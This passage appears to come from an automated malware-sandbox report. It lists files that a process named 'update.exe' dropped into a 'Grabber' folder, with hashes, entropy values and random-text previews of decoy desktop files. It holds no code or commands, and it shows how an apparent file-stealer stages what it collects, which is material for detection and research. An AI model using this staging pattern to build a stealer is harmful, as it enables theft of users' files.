                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
